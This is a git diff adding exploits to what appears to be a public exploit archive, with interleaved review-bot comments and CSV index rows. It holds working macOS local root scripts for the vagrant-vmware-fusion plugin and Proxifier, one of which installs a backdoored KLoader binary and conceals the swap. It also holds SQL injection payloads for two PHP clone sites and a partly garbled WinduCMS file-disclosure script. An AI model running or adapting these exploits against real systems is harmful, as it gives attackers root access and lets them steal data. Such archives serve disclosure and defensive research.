diff --git a/exploits/macos/local/43224.sh b/exploits/macos/local/43224.sh
new file mode 100755
index 000000000..30ac0a173
--- /dev/null
+++ b/exploits/macos/local/43224.sh
@@ -0,0 +1,138 @@ +# A couple of weeks ago I disclosed a local root privesc in Hashicorp's +# vagrant-vmware-fusion plugin: +# +# https://m4.rkw.io/blog/cve20177642-local-root-privesc-in-hashicorp-vagrantvmw... +# +# The initial patch they released was 4.0.21 which unfortunately contained a bug +# that prevented it from working at all on mac systems so I was unable to test it. +# I then had to give my mac to Apple for a couple of weeks for some repairs so +# only got around to testing 4.0.22 at the end of last week. +# +# Unfortunately, 4.0.22 is still exploitable and the subsequent release of 4.0.23 +# did not fix the issue. Hashicorp reacted much faster this time, taking only a +# few days to issue a patch instead of a few months and 4.0.24 does fix the issue. +# +# As discussed before the plugin installs a "sudo helper" encrypted ruby script +# and four architecture-specific wrappers into +# ~/.vagrant.d/gems/2.2.5/gems/vagrant-vmware-fusion-4.0.22/bin +# +# vagrant_vmware_desktop_sudo_helper +# vagrant_vmware_desktop_sudo_helper_wrapper_darwin_386 +# vagrant_vmware_desktop_sudo_helper_wrapper_darwin_amd64 +# vagrant_vmware_desktop_sudo_helper_wrapper_linux_386 +# vagrant_vmware_desktop_sudo_helper_wrapper_linux_amd64 +# +# The wrapper that matches the system architecture will be made suid root the +# first time any vagrant box is up'd. When a vagrant box is started the wrapper +# script elevates privileges and then executes the ruby sudo helper script. +# +# Previously I exploited the unsanitised system("ruby") call to simply invoke the +# wrapper directly and execute an arbitrary fake "ruby" script in the current PATH. +# This is now mitigated with 4.0.22 because the wrapper refuses to execute if it's +# not being called by vagrant. 
+# +# Unfortunately it's still possible to exploit it because the wrapper executes the +# sudo helper as root, and the sudo helper is not root-owned so we can overwrite it +# with any arbitrary ruby code which will then get executed as root when vagrant up +# is run. +# +# The issue was reported to Hashicorp on 27/07/17 and fixed on 01/08/17. +# +# This exploit requires a vmware_fusion box to be present on the system in order to +# work. If you don't have one it may take a few minutes to download one. Like +# last time it targets darwin 64bit but it's likely the other architectures are +# vulnerable too. +# +# https://m4.rkw.io/vagrant_vmware_privesc_4.0.23.sh.txt +# 81c2637cd1f4064c077aabc6fa7a3451ae3f2bd99c67f25c966728f88a89d5a1 +# -------------------------------------------------------------------------- + +#!/bin/bash +echo +echo "****************************************************************" +echo "* Wooo vmware_fusion plugin 4.0.22-4.0.23 is still exploitable *" +echo "* m4rkw *" +echo "****************************************************************" +echo +echo "Shouts to #coolkids" +echo + +vuln_bin=`find ~/.vagrant.d/ -name vagrant_vmware_desktop_sudo_helper_wrapper_darwin_amd64 -perm +4000 |tail -n1` +target="/tmp/vagrant_vmware_privesc_4.0.23" + +if [ "$vuln_bin" == "" ] ; then + echo "Vulnerable binary not found." + exit 1 +fi + +if [ -e "$target" ] ; then + echo "Exploit payload already present." + $target + exit +fi + +box=`vagrant box list |grep '(vmware_desktop' |head -n1 |cut -d ' ' -f1` + +if [ "$box" == "" ] ; then + echo "No vmware_fusion boxes found locally, we will have to download one." + echo + echo "This will take a few minutes." + echo + box="bento/ubuntu-16.04" +fi + +dir=`dirname "$vuln_bin"` + +cd "$dir" + +if [ ! 
-e "vagrant_vmware_desktop_sudo_helper.bak" ] ; then + mv vagrant_vmware_desktop_sudo_helper vagrant_vmware_desktop_sudo_helper.bak +fi + +cat > $target.c < +int main() +{ + setuid(0); + seteuid(0); + execl("/bin/bash","bash","-c","/bin/bash;rm -f $target",NULL); + return 0; +} +EOF +gcc -o $target $target.c +rm -f $target.c + +cat > vagrant_vmware_desktop_sudo_helper < vagrantfile </dev/null & + +while : +do + r=`ls -la $target |grep -- '-rwsr-xr-x 1 root wheel'` + if [ "$r" != "" ] ; then + break + fi + sleep 0.2 +done + +killall -9 vagrant + +echo +echo "Sorry Hashicorp.. still fail :P" +echo + +sleep 1 +cd +$target \ No newline at end of file diff --git a/exploits/macos/local/43225.sh b/exploits/macos/local/43225.sh new file mode 100755 index 000000000..3bbf070b3 --- /dev/null +++ b/exploits/macos/local/43225.sh 
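Review bot: The early-exit branch `if [ -e "$target" ] ; then … $target` executes whatever already exists at `/tmp/vagrant_vmware_privesc_4.0.23` without checking its ownership or mode, so a file planted there by any other local user runs with the invoking user's privileges; the branch should apply the same `-rwsr-xr-x 1 root wheel` condition the later wait loop insists on, or refuse and tell the user to remove the file. The script also renames the original helper to `vagrant_vmware_desktop_sudo_helper.bak` and never restores it, unlike the `cleanup` function in 43223.sh, so the plugin is left modified after the run; the header should say so, since that renamed file is the durable artefact an investigator would find.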
@@ -0,0 +1,87 @@ +# With CVE-2017-7643 I disclosed a command injection vulnerablity in the KLoader +# binary that ships with Proxifier <= 2.18. +# +# Unfortunately 2.19 is also vulnerable to a slightly different attack that +# yields the same result. +# +# When Proxifier is first run, if the KLoader binary is not suid root it gets +# executed as root by Proxifier.app (the user is prompted to enter an admin +# password). The KLoader binary will then make itself suid root so that it +# doesn't need to prompt the user again. +# +# The Proxifier developers added parameter sanitisation and kext signature +# verification to the KLoader binary as a fix for CVE-2017-7643 but Proxifier.app +# does no verification of the KLoader binary that gets executed as root. +# +# The directory KLoader sits in is not root-owned so we can replace it with +# our own binary that will get executed as root when Proxifier starts. +# +# To avoid raising any suspicion, as soon we get executed as root we can swap +# the real KLoader binary back into place and forward the execution call on +# to it. It does require the user to re-enter their credentials the next time +# Proxifier is run but it's likely most users wouldn't think anything of this. +# +# Users should upgrade to version 2.19.2. 
+# +# https://m4.rkw.io/proxifier_privesc_219.sh.txt +# 3e30f1c7ea213e0ae1f4046e1209124ee79a5bec479fa23d0b2143f9725547ac +# ------------------------------------------------------------------- + +#!/bin/bash + +##################################################################### +# Local root exploit for vulnerable KLoader binary distributed with # +# Proxifier for Mac v2.19 # +##################################################################### +# by m4rkw, shouts to #coolkids :P # +##################################################################### + +cat > a.c < +#include + +int main() +{ + setuid(0); + seteuid(0); + + execl("/bin/bash", "bash", NULL); + return 0; +} +EOF + +gcc -o /tmp/a a.c + +cat > a.c < +#include +#include +#include +#include + +int main(int ac, char *av[]) +{ + if (geteuid() != 0) { + printf("KLoader: UID not set to 0\n"); + return 104; + } else { + seteuid(0); + setuid(0); + + chown("/tmp/a", 0, 0); + chmod("/tmp/a", strtol("4755", 0, 8)); + rename("/Applications/Proxifier.app/Contents/KLoader2", "/Applications/Proxifier.app/Contents/KLoader"); + chown("/Applications/Proxifier.app/Contents/KLoader", 0, 0); + chmod("/Applications/Proxifier.app/Contents/KLoader", strtol("4755", 0, 8)); + execv("/Applications/Proxifier.app/Contents/KLoader", av); + + return 0; + } +} +EOF + +mv -f /Applications/Proxifier.app/Contents/KLoader /Applications/Proxifier.app/Contents/KLoader2 +gcc -o /Applications/Proxifier.app/Contents/KLoader a.c +rm -f a.c + +echo "Backdoored KLoader installed, the next time Proxifier starts /tmp/a will become suid root." \ No newline at end of file diff --git a/exploits/php/webapps/43213.txt b/exploits/php/webapps/43213.txt new file mode 100644 index 000000000..1a9c6ca48 --- /dev/null +++ b/exploits/php/webapps/43213.txt 
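Review bot: The header comment records the fixed version (2.19.2) but gives a defender nothing to check for on a host where this technique may already have been used, even though the script itself leaves two plain traces: a `KLoader` under `/Applications/Proxifier.app/Contents/` that is no longer the vendor-signed binary, and the original renamed beside it as `KLoader2`. I would add one line after the upgrade advice: `# Detection: a KLoader in Proxifier.app/Contents that fails code-signature verification, or a sibling KLoader2 file, indicates the binary was replaced.` The only identifier given is CVE-2017-7643 for the earlier issue; if the vendor or a CVE was assigned to this follow-up, noting it in the header would make the two issues easier to tell apart in tracking.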
@@ -0,0 +1,26 @@ +# Exploit Title: FS Makemytrip Clone - SQL Injection +# Date: 2017-12-05 +# Exploit Author: Dan° +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/makemytrip-clone/ +# Version: 2017-12-05 +# Tested on: Kali Linux 2.0 + +(PoC): +SQL Injection on GET parameter = id +http://localhost/pages.php?id= + +--- +Parameter: id (GET) +Type: boolean-based blind +Title: AND boolean-based blind - WHERE or HAVING clause +Payload: id=1 AND 2990=2990 +Type: AND/OR time-based blind +Title: MySQL >= 5.0.12 OR time-based blind +Payload: id=1 OR SLEEP(5) +Type: UNION query +Title: Generic UNION query (NULL) - 4 columns +Payload: id=-4648 UNION ALL SELECT +NULL,NULL,CONCAT(0x716b767a71,0x47714f5a66644664796a6a426879674757634b707753727544424f616944536d4d70655276565854,0x7178627171),NULL-- +YbYU +--- \ No newline at end of file diff --git a/exploits/php/webapps/43214.py b/exploits/php/webapps/43214.py new file mode 100755 index 000000000..ca7a516b4 --- /dev/null +++ b/exploits/php/webapps/43214.py 
@@ -0,0 +1,36 @@ +#!/usr/bin/python +# +# Exploit Title: WinduCMS <= 3.1 - Local File Disclosure +# Date: 2017-12-03 +# Exploit Author: Maciek Krupa +# Vendor Homepage: http://windu.org +# Version: 3.1 +# Tested on: Linux Debian 9 +# +# // Description // +# +# Local File Disclosure vulnerability exists in WinduCMS through a vulnerable PHPMailer version 5.2.1 used here +# +# // PoC // +# +# It requires a contact form present on the website +# +# Example: {{W name=contactForm inputs="name" email="root@localhost"}} +# + +from requests_toolbelt import MultipartEncoder +import requests + +print("WinduCMS <= 3.1 Exploit") + +url = 'http://localhost/contact_page?mn=contactform.message.negative' +email = 'attacker@example.com' +payload = '= 5.0.12 AND time-based blind +Payload: token=2060a87ff679a2f3e71d9181a67b7542122c' AND SLEEP(5)-- aVZf + +Type: UNION query +Title: Generic UNION query (NULL) - 77 columns +Payload: token=-5886' UNION ALL SELECT +NULL,CONCAT(0x7162787171,0x6153755a46504d6a546578714d765a594a5359556c414f4d736c45444958686e4455564770526272,0x7170787071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- +nVKG +--- \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 480d2b5be..d80c475a6 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -9367,6 +9367,16 @@ id,file,description,date,author,type,platform,port
 43187,exploits/windows/local/43187.txt,"Diving Log 6.0 - XML External Entity Injection",2017-11-27,"Trent Gordon",local,windows,
 43192,exploits/win_x86/local/43192.c,"Microsoft Windows 10 Creators Update (version 1703) (x86) - 'WARBIRD' 'NtQuerySystemInformation ' Kernel Local Privilege Escalation",2017-11-27,XPN,local,win_x86,
 43201,exploits/macos/local/43201.rb,"macOS High Sierra - Local Privilege Escalation (Metasploit)",2017-11-30,Metasploit,local,macos,
+43216,exploits/macos/local/43216.rb,"Arq 5.9.7 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,
+43217,exploits/macos/local/43217.sh,"Murus 1.4.11 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,
+43218,exploits/macos/local/43218.sh,"Arq 5.9.6 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,
+43219,exploits/macos/local/43219.sh,"Hashicorp vagrant-vmware-fusion 5.0.3 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,
+43220,exploits/macos/local/43220.sh,"Hashicorp vagrant-vmware-fusion 5.0.1 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,
+43221,exploits/macos/local/43221.sh,"Sera 1.2 - Local Privilege Escalation / Password Disclosure",2017-12-06,"Mark Wadham",local,macos,
+43222,exploits/macos/local/43222.sh,"Hashicorp vagrant-vmware-fusion 5.0.0 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,
+43223,exploits/macos/local/43223.sh,"Hashicorp vagrant-vmware-fusion 4.0.24 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,
+43224,exploits/macos/local/43224.sh,"Hashicorp vagrant-vmware-fusion 4.0.23 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,
+43225,exploits/macos/local/43225.sh,"Proxifier for Mac 2.19 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote (PoC)",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -38245,3 +38255,6 @@ id,file,description,date,author,type,platform,port
 43210,exploits/windows/webapps/43210.txt,"Perspective ICM Investigation & Case 5.1.1.16 - Privilege Escalation",2017-12-05,"Konstantinos Alexiou",webapps,windows,
 43211,exploits/php/webapps/43211.txt,"Techno Portfolio Management Panel - 'id' SQL Injection",2017-12-05,"Ihsan Sencan",webapps,php,
 43212,exploits/php/webapps/43212.txt,"Readymade Classifieds Script 1.0 - SQL Injection",2017-12-05,"Ihsan Sencan",webapps,php,
+43213,exploits/php/webapps/43213.txt,"FS Makemytrip Clone - 'id' SQL Injection",2017-12-06,Dan°,webapps,php,
+43214,exploits/php/webapps/43214.py,"WinduCMS 3.1 - Local File Disclosure",2017-12-06,"Maciek Krupa",webapps,php,
+43215,exploits/php/webapps/43215.txt,"FS Shaadi Clone - 'token' SQL Injection",2017-12-06,Dan°,webapps,php,80
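Review bot: The port column is inconsistent across the webapps rows added in the second hunk: `43215` ends with `80` while `43213`, `43214` and the neighbouring context rows 43211 and 43212 leave the field empty. Unless the Shaadi Clone entry is deliberately bound to port 80, the trailing field should be blank for consistency, i.e. `43215,exploits/php/webapps/43215.txt,"FS Shaadi Clone - 'token' SQL Injection",2017-12-06,Dan°,webapps,php,`. Separately, one of the macos shell files in this commit carries a header describing the vmware_fusion plugin 4.0.22-4.0.23, so it may be worth confirming that each of the 43217-43224 descriptions in the first hunk matches the header of the file it points to; I could not verify that mapping from this view.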